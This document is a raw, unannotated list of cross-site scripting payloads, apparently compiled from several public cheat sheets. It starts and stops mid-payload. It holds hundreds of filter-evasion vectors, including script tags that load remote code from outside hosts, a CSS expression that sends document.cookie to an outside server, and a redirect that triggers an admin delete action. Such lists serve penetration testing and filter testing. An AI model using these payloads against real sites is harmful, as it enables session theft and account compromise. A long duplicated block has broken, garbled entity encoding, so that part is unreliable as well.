url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC=&apos;vbscript:msgbox("XSS")&apos;> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <IMG SRC="livescript:[code]"> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(&apos;XSS&apos;);"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);"> <IMG SRC="mocha:[code]"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(&apos;XSS&apos;)></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert(&apos;XSS&apos;);")";eval(a+b+c+d); <STYLE TYPE="text/javascript">alert(&apos;XSS&apos;);</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))"> <XSS STYLE="xss:expression(alert(&apos;XSS&apos;))"> <STYLE>.XSS{background-image:url("javascript:alert(&apos;XSS&apos;)");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert(&apos;XSS&apos;)")}</STYLE> <LINK REL="stylesheet" HREF="javascript:alert(&apos;XSS&apos;);"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import&apos;http://ha.ckers.org/xss.css&apos;;</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <TABLE BACKGROUND="javascript:alert(&apos;XSS&apos;)"></TABLE> <TABLE><TD BACKGROUND="javascript:alert(&apos;XSS&apos;)"></TD></TABLE> <HTML xmlns:xss> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(&apos;XSS&apos;);">]]> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(&apos;XSS&apos;)"></B></I></XML> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <!--[if gte IE 4]>               <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(&apos;XSS&apos;)</SCRIPT>"> <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo &apos;<SCRIPT SRC&apos;"--><!--#exec cmd="/bin/echo &apos;=http://ha.ckers.org/xss.js></SCRIPT>&apos;"--> <? echo(&apos;<SCR)&apos;; <BR SIZE="&{alert(&apos;XSS&apos;)}"> <IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=`javascript:alert("RSnake says, &apos;XSS&apos;")`> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <DIV STYLE="background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029"> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4- \";alert(&apos;XSS&apos;);// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <STYLE>@im\port&apos;\ja\vasc\ript:alert("XSS")&apos;;</STYLE> <IMG SRC="jav ascript:alert(&apos;XSS&apos;);"> <IMG SRC="jav&#x09;ascript:alert(&apos;XSS&apos;);"> <IMG SRC="jav&#x0A;ascript:alert(&apos;XSS&apos;);"> <IMG SRC="jav&#x0D;ascript:alert(&apos;XSS&apos;);"> <IMGSRC="javascript:alert(&apos;XSS&apos;)"> perl -e &apos;print "<IMG SRC=java\0script:alert("XSS")>";&apos;> out perl -e &apos;print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";&apos; > out <IMG SRC=" &#14;  javascript:alert(&apos;XSS&apos;);"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT SRC=http://ha.ckers.org/xss.js <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert(&apos;XSS&apos;)" <IFRAME SRC=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <SCRIPT>a=/XSS/ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a="blah" &apos;&apos; SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a=&apos;>&apos;" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">&apos;>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6&#09;6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location=&apos;http://www.google.com/&apos;">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> <script>document.vulnerable=true;</script> <img SRC="jav ascript:document.vulnerable=true;"> <img SRC="javascript:document.vulnerable=true;"> <img SRC=" &#14; javascript:document.vulnerable=true;"> <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> <<SCRIPT>document.vulnerable=true;//<</SCRIPT> <script <B>document.vulnerable=true;</script> <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < <script>a=/XSS/\ndocument.vulnerable=true;</script> \";document.vulnerable=true;;// </title><SCRIPT>document.vulnerable=true;</script> <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> <body BACKGROUND="javascript:document.vulnerable=true;"> <body ONLOAD=document.vulnerable=true;> <img DYNSRC="javascript:document.vulnerable=true;"> <img LOWSRC="javascript:document.vulnerable=true;"> <bgsound SRC="javascript:document.vulnerable=true;"> <br SIZE="&{document.vulnerable=true}"> <LAYER SRC="javascript:document.vulnerable=true;"></LAYER> <link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS <img SRC='vbscript:document.vulnerable=true;'> 1script3document.vulnerable=true;1/script3 <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> <IFRAME SRC="javascript:document.vulnerable=true;"></iframe> <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> <table BACKGROUND="javascript:document.vulnerable=true;"> <table><TD BACKGROUND="javascript:document.vulnerable=true;"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> <div STYLE="width: expression(document.vulnerable=true);"> <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> <XSS STYLE="xss:expression(document.vulnerable=true)"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> <style TYPE="text/javascript">document.vulnerable=true;</style> <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> <base HREF="javascript:document.vulnerable=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.vulnerable=true;"> <div onmouseover="document.vulnerable=true;"> <img src="javascript:document.vulnerable=true;"> <img dynsrc="javascript:document.vulnerable=true;"> <input type="image" dynsrc="javascript:document.vulnerable=true;"> <bgsound src="javascript:document.vulnerable=true;"> &<script>document.vulnerable=true;</script> &{document.vulnerable=true;}; <img src=&{document.vulnerable=true;};> <link rel="stylesheet" href="javascript:document.vulnerable=true;"> <iframe src="vbscript:document.vulnerable=true;"> <img src="mocha:document.vulnerable=true;"> <img src="livescript:document.vulnerable=true;"> <a href="about:<script>document.vulnerable=true;</script>"> <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> <body onload="document.vulnerable=true;"> <div style="background-image: url(javascript:document.vulnerable=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.vulnerable=true;);"> <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> <style><!--</style><script>document.vulnerable=true;//--></script> <<script>document.vulnerable=true;</script> <![<!--]]<script>document.vulnerable=true;//--></script> <!-- -- --><script>document.vulnerable=true;</script><!-- -- --> <img src="blah"onmouseover="document.vulnerable=true;"> <img src="blah>" onmouseover="document.vulnerable=true;"> <xml src="javascript:document.vulnerable=true;"> <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> <script SRC="http://www.securitycompass.com/xss.jpg"></script> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> <script a=">" SRC="http://www.securitycompass.com/xss.js"></script> <script =">" SRC="http://www.securitycompass.com/xss.js"></script> <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> </script><script>alert(1)</script> </br style=a:expression(alert())> <scrscriptipt>alert(1)</scrscriptipt> <br size=\"&{alert('XSS')}\"> perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS STYLE=xss:expression(alert('XSS'))> "><script>alert('XSS')</script> </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> </XSS STYLE=xss:expression(alert('XSS'))> ';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; ';';;!--";<;XSS>;=&;{()} <;SCRIPT>;alert(';XSS';)<;/SCRIPT>; <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; <;BASE HREF=";javascript:alert(';XSS';);//";>; <;BGSOUND SRC=";javascript:alert(';XSS';);";>; <;BODY BACKGROUND=";javascript:alert(';XSS';);";>; <;BODY ONLOAD=alert(';XSS';)>; <;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; <;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; <;DIV STYLE=";width: expression(alert(';XSS';));";>; <;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; <;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; <;IMG SRC=";javascript:alert(';XSS';);";>; <;IMG SRC=javascript:alert(';XSS';)>; <;IMG DYNSRC=";javascript:alert(';XSS';);";>; <;IMG LOWSRC=";javascript:alert(';XSS';);";>; <;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); <;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS <;IMG SRC=';vbscript:msgbox(";XSS";)';>; <;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; <;IMG SRC=";livescript:[code]";>; %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; <;IMG SRC=";mocha:[code]";>; <;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; <;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;eval(a+b+c+d); <;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; <;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; <;XSS STYLE=";xss:expression(alert(';XSS';))";>; <;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; <;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; <;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; <;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; <;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; <;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; <;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; <;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; <;HTML xmlns:xss>; <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; <;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; <;HTML>;<;BODY>; <;!--[if gte IE 4]>;           <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; <;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; <;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; <;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; <;? echo(';<;SCR)';; <;BR SIZE=";&;{alert(';XSS';)}";>; <;IMG SRC=JaVaScRiPt:alert(';XSS';)>; <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; <;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; <;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- \";;alert(';XSS';);// <;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; <;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; <;IMG SRC=";jav ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; <;IMGSRC=";javascript:alert';XSS';)";>; perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out <;IMG SRC="; &;#14;  javascript:alert(';XSS';);";>; <;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; <;SCRIPT SRC=http://ha.ckers.org/xss.js <;SCRIPT SRC=//ha.ckers.org/.j>; <;IMG SRC=";javascript:alert(';XSS';)"; <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; <;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; <;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; <;SCRIPT>;a=/XSS/ <;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;A HREF=";http://66.102.7.147/";>;XSS<;/A>; <;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; <;A HREF=";http://1113982867/";>;XSS<;/A>; <;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; <;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; <;A HREF=";htt p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; <;A HREF=";//www.google.com/";>;XSS<;/A>; <;A HREF=";//google";>;XSS<;/A>; <;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; <;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; <;A HREF=";http://google.com/";>;XSS<;/A>; <;A HREF=";http://www.google.com./";>;XSS<;/A>; <;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; <;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; <script>document.vulnerable=true;</script> <img SRC="jav ascript:document.vulnerable=true;"> <img SRC="javascript:document.vulnerable=true;"> <img SRC=" &#14; javascript:document.vulnerable=true;"> <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> <<SCRIPT>document.vulnerable=true;//<</SCRIPT> <script <B>document.vulnerable=true;</script> <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < <script>a=/XSS/\ndocument.vulnerable=true;</script> \";document.vulnerable=true;;// </title><SCRIPT>document.vulnerable=true;</script> <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> <body BACKGROUND="javascript:document.vulnerable=true;"> <body ONLOAD=document.vulnerable=true;> <img DYNSRC="javascript:document.vulnerable=true;"> <img LOWSRC="javascript:document.vulnerable=true;"> <bgsound SRC="javascript:document.vulnerable=true;"> <br SIZE="&{document.vulnerable=true}"> <LAYER SRC="javascript:document.vulnerable=true;"></LAYER> <link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS <img SRC='vbscript:document.vulnerable=true;'> 1script3document.vulnerable=true;1/script3 <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> <IFRAME SRC="javascript:document.vulnerable=true;"></iframe> <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> <table BACKGROUND="javascript:document.vulnerable=true;"> <table><TD BACKGROUND="javascript:document.vulnerable=true;"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> <div STYLE="width: expression(document.vulnerable=true);"> <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> <XSS STYLE="xss:expression(document.vulnerable=true)"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> <style TYPE="text/javascript">document.vulnerable=true;</style> <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> <base HREF="javascript:document.vulnerable=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.vulnerable=true;"> <div onmouseover="document.vulnerable=true;"> <img src="javascript:document.vulnerable=true;"> <img dynsrc="javascript:document.vulnerable=true;"> <input type="image" dynsrc="javascript:document.vulnerable=true;"> <bgsound src="javascript:document.vulnerable=true;"> &<script>document.vulnerable=true;</script> &{document.vulnerable=true;}; <img src=&{document.vulnerable=true;};> <link rel="stylesheet" href="javascript:document.vulnerable=true;"> <iframe src="vbscript:document.vulnerable=true;"> <img src="mocha:document.vulnerable=true;"> <img src="livescript:document.vulnerable=true;"> <a href="about:<script>document.vulnerable=true;</script>"> <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> <body onload="document.vulnerable=true;"> <div style="background-image: url(javascript:document.vulnerable=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.vulnerable=true;);"> <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> <style><!--</style><script>document.vulnerable=true;//--></script> <<script>document.vulnerable=true;</script> <![<!--]]<script>document.vulnerable=true;//--></script> <!-- -- --><script>document.vulnerable=true;</script><!-- -- --> <img src="blah"onmouseover="document.vulnerable=true;"> <img src="blah>" onmouseover="document.vulnerable=true;"> <xml src="javascript:document.vulnerable=true;"> <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> <script SRC="http://www.securitycompass.com/xss.jpg"></script> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> <script a=">" SRC="http://www.securitycompass.com/xss.js"></script> <script =">" SRC="http://www.securitycompass.com/xss.js"></script> <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> <div style="binding: 